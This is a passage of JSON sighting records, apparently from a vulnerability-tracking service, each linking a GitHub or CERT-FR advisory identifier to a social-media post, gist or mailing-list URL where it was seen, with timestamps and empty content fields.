"https://infosec.exchange/users/cR0w/statuses/115067716138027501", "content": "", "creation_timestamp": "2025-08-21T16:33:29.310617Z"}, {"uuid": "097c5bc4-0869-4c03-894b-57d1163d091d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hc35-h924-8596", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115589509189463539", "content": "", "creation_timestamp": "2025-11-21T20:12:19.212239Z"}, {"uuid": "cda13f67-7fb1-4c93-a17f-0c4bb0b867b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-046", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115446843242263012", "content": "", "creation_timestamp": "2025-10-27T15:30:31.599591Z"}, {"uuid": "4dffff42-5d6f-403b-9c2d-bba7e7fbc97c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73g8-5h73-26h4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115589518891298219", "content": "", "creation_timestamp": "2025-11-21T20:14:47.162244Z"}, {"uuid": "4be89695-8f34-4398-8496-d68cec26a386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hpwq-c98h-xp8g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115537154870855818", "content": "", "creation_timestamp": "2025-11-12T14:17:55.728025Z"}, {"uuid": "c6f9c64e-a5ff-4de1-8ef0-b5c3007e55be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5rrx-jjjq-q2r5", "type": "seen", "source": "https://bsky.app/profile/appsecfeed.bsky.social/post/3m3a5mcs3go2d", "content": "", "creation_timestamp": "2025-10-15T11:35:09.655167Z"}, {"uuid": "a1bb6751-5e37-400e-b8ce-ba7860acf071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8h43-rcqj-wpc6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115413219015340046", "content": "", "creation_timestamp": "2025-10-21T16:59:24.586003Z"}, {"uuid": "511a5d15-37d9-4e87-b365-941f83d2a950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pqhf-p39g-3x64", "type": "seen", "source": "https://gist.github.com/EbonJaeger/f7d172d49605e41a6829980152c0f6d1", "content": "", "creation_timestamp": "2025-11-07T20:31:33.000000Z"}, {"uuid": "bfc59f57-eb7c-443c-ba5a-2a412eb2b1e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q428-6v73-fc4q", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-3f4e7d7c-867ac0d13e9371e2", "content": "", "creation_timestamp": "2025-11-14T18:46:33.944630Z"}, {"uuid": "0d6098ca-c2fa-445e-ad31-119960e54d29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c978-wq47-pvvw", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-3f4e7d7c-867ac0d13e9371e2", "content": "", "creation_timestamp": "2025-11-14T18:46:34.040417Z"}, {"uuid": "ae4c2f47-a56b-4292-8293-5a865a2264e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mh29-5h37-fv8m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115543200501188755", "content": "", "creation_timestamp": "2025-11-13T15:55:24.711691Z"}, {"uuid": "a597e673-d751-4b03-aeca-fe595c2af156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6xvf-4vh9-mw47", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115590024467115020", "content": "", "creation_timestamp": "2025-11-21T22:23:21.594588Z"}, {"uuid": "98c2aa3c-6b20-4178-8191-98f5545a34ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58m4-5wg3-5g5v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115567255970666465", "content": "", "creation_timestamp": "2025-11-17T21:53:01.989186Z"}, {"uuid": "e627f553-12f5-4017-ac52-fb952bef2bd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-547r-qmjm-8hvw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115590032341926065", "content": "", "creation_timestamp": "2025-11-21T22:25:21.908294Z"}, {"uuid": "f0cc632c-9819-4b6f-a029-7c40cd4a00d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6qv9-48xg-fc7f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115590036421081698", "content": "", "creation_timestamp": "2025-11-21T22:26:24.116088Z"}, {"uuid": "4a52d44c-4eca-4cac-b8ca-57608f7eed4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hwm7-w97p-4h8p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115590060817850699", "content": "", "creation_timestamp": "2025-11-21T22:32:36.279072Z"}, {"uuid": "5c3adfb7-3801-4801-b8ea-ab205965eac7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-042", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m32ctdxphy2o", "content": "", "creation_timestamp": "2025-10-13T03:52:36.026955Z"}, {"uuid": "e2808dc4-1e6a-4ffd-895d-4bc85a9ed4ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/305a267e4eff1c36fe3fbdd5519185b4", "content": "", "creation_timestamp": "2025-10-26T10:52:46.000000Z"}, {"uuid": "63a16a84-5117-4db2-8736-64f265508a27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-526j-mv3p-f4vv", "type": "seen", "source": "https://bsky.app/profile/checkmarxzero.bsky.social/post/3lv4dooo6p223", "content": "", "creation_timestamp": "2025-07-29T14:42:03.141882Z"}, {"uuid": "b1fed24f-12a3-4bb9-a683-c651452557aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/d466a8b3769f62cf6febf2813a0358be", "content": "", "creation_timestamp": "2025-10-26T11:02:50.000000Z"}, {"uuid": "d783d466-6b32-44d0-8775-67d84330bb34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/d466a8b3769f62cf6febf2813a0358be", "content": "", "creation_timestamp": "2025-10-26T11:02:50.000000Z"}, {"uuid": "9726b2ee-f59f-4339-af13-0131c55330c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/5359e92fdfb7a2483b10e3c6a99d49d6", "content": "", "creation_timestamp": "2025-10-26T11:25:11.000000Z"}, {"uuid": "db1582f8-cd20-4a2f-8a4d-2cd9cc732f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/5359e92fdfb7a2483b10e3c6a99d49d6", "content": "", "creation_timestamp": "2025-10-26T11:25:11.000000Z"}, {"uuid": "c26b9609-679a-4b1b-9226-5a018092147b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/03f53c003449893569544718afc27959", "content": "", "creation_timestamp": "2025-11-11T23:19:12.000000Z"}, {"uuid": "d8bc7ba6-834e-46a0-bac7-b8d9b107ba3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/03f53c003449893569544718afc27959", "content": "", "creation_timestamp": "2025-11-11T23:19:12.000000Z"}, {"uuid": "3381dbae-af6b-4f71-a3d3-d8be2b8cb342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/5359e92fdfb7a2483b10e3c6a99d49d6", "content": "", "creation_timestamp": "2025-10-26T11:25:11.000000Z"}, {"uuid": "f657a93a-5cfa-4ff4-ac7c-bc206f5f3d66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/5359e92fdfb7a2483b10e3c6a99d49d6", "content": "", "creation_timestamp": "2025-10-26T11:25:11.000000Z"}, {"uuid": "bb4b5127-6de9-4933-9779-c7228aaefad8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-052", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m6wjmyxrdx2w", "content": "", "creation_timestamp": "2025-12-01T13:24:26.873445Z"}, {"uuid": "ba7e8651-f3fd-4eb9-ac81-eb0979c74c19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-052", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115644528440908877", "content": "", "creation_timestamp": "2025-12-01T13:24:27.860501Z"}, {"uuid": "fb8a4c30-92a0-4d79-a8e1-3cb0e88477e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-052", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m6wkhbym2m2a", "content": "", "creation_timestamp": "2025-12-01T13:39:09.093130Z"}, {"uuid": "590d589a-9f13-4697-be7f-c05c7eec7121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/09ff34e5f39fe1604e888b530e0fdc51", "content": "", "creation_timestamp": "2025-10-26T11:39:55.000000Z"}, {"uuid": "1d9fafb3-fc74-4b9a-bfd5-63055e3737e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/09ff34e5f39fe1604e888b530e0fdc51", "content": "", "creation_timestamp": "2025-10-26T11:39:55.000000Z"}, {"uuid": "cbf962f3-0dce-45e1-856f-c6241d9d7272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/09ff34e5f39fe1604e888b530e0fdc51", "content": "", "creation_timestamp": "2025-10-26T11:39:55.000000Z"}, {"uuid": "ba808961-ebfb-41d1-9c77-4ef9c6e5ced0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/dc8d2a57a6175649dac12baac1462dee", "content": "", "creation_timestamp": "2025-10-26T11:48:23.000000Z"}, {"uuid": "fa5b3943-83f7-4cd6-b219-3dcd0b44a950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p84v-gxvw-73pf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115373154971973700", "content": "", "creation_timestamp": "2025-10-14T15:10:35.927832Z"}, {"uuid": "036ecccb-bda3-43bc-b5ce-6632d0e9757a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "b95f9d3c-134e-449e-a8e2-e057a379f9b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-011", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lvnvfrpi552u", "content": "", "creation_timestamp": "2025-08-05T14:14:27.221603Z"}, {"uuid": "74c77605-ed31-4efc-a6d6-dd77eaa45381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-011", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114976573294128741", "content": "", "creation_timestamp": "2025-08-05T14:14:41.879912Z"}, {"uuid": "a461175c-f334-4243-af39-7e0051c96855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84ch-6436-c7mg", "type": "seen", "source": "https://bsky.app/profile/trankten.tkz.one.ap.brid.gy/post/3lvodvb6ooqq2", "content": "", "creation_timestamp": "2025-08-05T18:38:24.134489Z"}, {"uuid": "41b24260-730f-41e5-881a-6edf22de5033", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84ch-6436-c7mg", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3lvokmbfsm6t2", "content": "", "creation_timestamp": "2025-08-05T20:34:46.445685Z"}, {"uuid": "a49456df-36ec-4554-8a6b-0cafc7d80007", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rrx3-2x4g-mq2h", "type": "seen", "source": "https://gist.github.com/fyxme/c1bb7f7883446fde1663777575628ca9", "content": "", "creation_timestamp": "2025-11-13T04:16:46.000000Z"}, {"uuid": "cf71d6a0-7daa-47d0-89b5-75a200790eba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-050", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m6ezbyzdja27", "content": "", "creation_timestamp": "2025-11-24T14:16:42.461594Z"}, {"uuid": "3073993a-f906-498d-bd6f-f0e200d2c8dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-050", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115605097721082231", "content": "", "creation_timestamp": "2025-11-24T14:16:45.564278Z"}, {"uuid": "5c64d593-e993-4567-a3c3-db7130e503a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mq77-rv97-285m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115373271394852399", "content": "", "creation_timestamp": "2025-10-14T15:40:12.342074Z"}, {"uuid": "ea2791ce-b437-4b6c-a8de-59fc88b53846", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-662m-56v4-3r8f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115646338745778362", "content": "", "creation_timestamp": "2025-12-01T21:04:49.217957Z"}, {"uuid": "2babd90e-390f-445f-9a13-e5a58c0d7226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r6h-8v6p-xvw6", "type": "seen", "source": "https://gist.github.com/conf1dentialaibusiness-source/0b49fe9990209fb038f5f50b73873dae", "content": "", "creation_timestamp": "2025-11-14T02:45:47.000000Z"}, {"uuid": "7a438f5d-5b56-4b30-95a6-6fa8d9f137fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5pgg-2g8v-p4x9", "type": "seen", "source": "https://gist.github.com/conf1dentialaibusiness-source/0b49fe9990209fb038f5f50b73873dae", "content": "", "creation_timestamp": "2025-11-14T02:45:47.000000Z"}, {"uuid": "20eceb07-c91a-4653-a208-d4114bcd72c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "1a8600c3-4ccb-4b12-ae08-36534ca7b42c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9493-h29p-rfm2", "type": "seen", "source": "https://hachyderm.io/users/ChrisShort/statuses/115498378756205250", "content": "", "creation_timestamp": "2025-11-05T17:56:39.617847Z"}, {"uuid": "28908084-3661-40e2-a32e-5b5745479587", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-045", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m3mvbm2aoq2y", "content": "", "creation_timestamp": "2025-10-20T13:10:36.804684Z"}, {"uuid": "69de577f-c87a-4fe4-bae2-aba78379dcb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-045", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115406656997632462", "content": "", "creation_timestamp": "2025-10-20T13:10:38.493500Z"}, {"uuid": "62456997-beee-4326-9bce-9115f96693cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wr9h-g72x-mwhm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115333317985711431", "content": "", "creation_timestamp": "2025-10-07T14:19:31.945934Z"}, {"uuid": "90466fe1-8392-4dd1-9782-34e8da5fb0ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg6w-rmh5-r77r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115311404732212763", "content": "", "creation_timestamp": "2025-10-03T17:26:42.268608Z"}, {"uuid": "65aea91e-d037-4440-a342-5087dc3d338a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wj33-264c-j9cq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115311407023262948", "content": "", "creation_timestamp": "2025-10-03T17:27:17.206151Z"}, {"uuid": "18d6162a-bc53-4335-a230-31999f0a3e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w6c3-pxvr-6m6j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115464279319296932", "content": "", "creation_timestamp": "2025-10-30T17:24:43.052771Z"}, {"uuid": "77248ac2-a8bd-43dd-9e3a-ebe5f2a61865", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-033", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lw56zqcltz2e", "content": "", "creation_timestamp": "2025-08-11T16:16:36.339772Z"}, {"uuid": "81cd49f1-a448-41f5-9952-743b0d9f829c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6vw-w3p8-4g72", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115011465274606119", "content": "", "creation_timestamp": "2025-08-11T18:08:09.302556Z"}, {"uuid": "273a7120-c05d-48f3-af4e-7788e6f6bcd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qph-pxfm-q9g4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115012126758790279", "content": "", "creation_timestamp": "2025-08-11T20:56:24.018780Z"}, {"uuid": "7742cd4d-3541-494d-85ca-0433eab732e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qgj3-f9gj-98v9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115374244887228575", "content": "", "creation_timestamp": "2025-10-14T19:47:46.610386Z"}, {"uuid": "1cc01c0b-5c02-45b7-b6ba-7274893899df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wpp5-4w35-pxq6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115385150455454568", "content": "", "creation_timestamp": "2025-10-16T18:01:12.150197Z"}, {"uuid": "1bfc07a1-d9cc-4dd4-a3dd-fce7a7bb3d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ggxq-hp9w-j794", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3m65d3nacyr2q", "content": "", "creation_timestamp": "2025-11-21T12:50:48.317190Z"}, {"uuid": "31965716-6682-426e-8776-8b17359a9847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5w3r-f6gm-c25w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115374251460586628", "content": "", "creation_timestamp": "2025-10-14T19:49:26.895967Z"}, {"uuid": "c9dc450a-794b-4305-bc35-878bd86589a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q8j9-34qf-7vq7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115453614388545204", "content": "", "creation_timestamp": "2025-10-28T20:12:29.082573Z"}, {"uuid": "9ca747e0-8822-4079-9825-37796d2da01c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7p8x-8m3m-58j9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115374254067224192", "content": "", "creation_timestamp": "2025-10-14T19:50:06.607517Z"}, {"uuid": "fa7c258e-53a5-4525-9307-9035774ccd5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-292p-rj6h-54cp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115374254067224192", "content": "", "creation_timestamp": "2025-10-14T19:50:06.707028Z"}, {"uuid": "98446159-abbc-4bf8-8333-d4ca37bcf443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-042", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m2mjdzebso2f", "content": "", "creation_timestamp": "2025-10-07T16:12:01.548825Z"}, {"uuid": "fe69151f-4d8f-452c-9ac4-d27b4f80c288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x34m-39xw-g2wr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115012282201647161", "content": "", "creation_timestamp": "2025-08-11T21:35:54.596584Z"}, {"uuid": "0bcde796-6673-4f59-ad1b-fc5a714585c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3r4f-mm4w-wgg6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115013370259680188", "content": "", "creation_timestamp": "2025-08-12T02:12:37.078803Z"}, {"uuid": "c68fcdf9-a199-4fe0-9a27-ed7a622b03e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5fg8-wvx3-583x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115013370259680188", "content": "", "creation_timestamp": "2025-08-12T02:12:37.174045Z"}, {"uuid": "131a6331-0cdf-4e8c-884a-bd4da25608b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rrjv-57mm-j6cm", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115374444988356308", "content": "", "creation_timestamp": "2025-10-14T20:38:41.240367Z"}, {"uuid": "c0ac7b29-57f8-4a9a-8f23-ba1e8b123afc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qpq3-646c-vgx9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115016629431295944", "content": "", "creation_timestamp": "2025-08-12T16:01:28.221240Z"}, {"uuid": "cfea1b7a-1cbe-4ecc-b380-080209cdee8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-359x-c69j-q64r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115016686292744862", "content": "", "creation_timestamp": "2025-08-12T16:15:55.720715Z"}, {"uuid": "56b32ed7-08ad-4f3b-af16-cdc758077958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26f4-rx96-xc55", "type": "seen", "source": 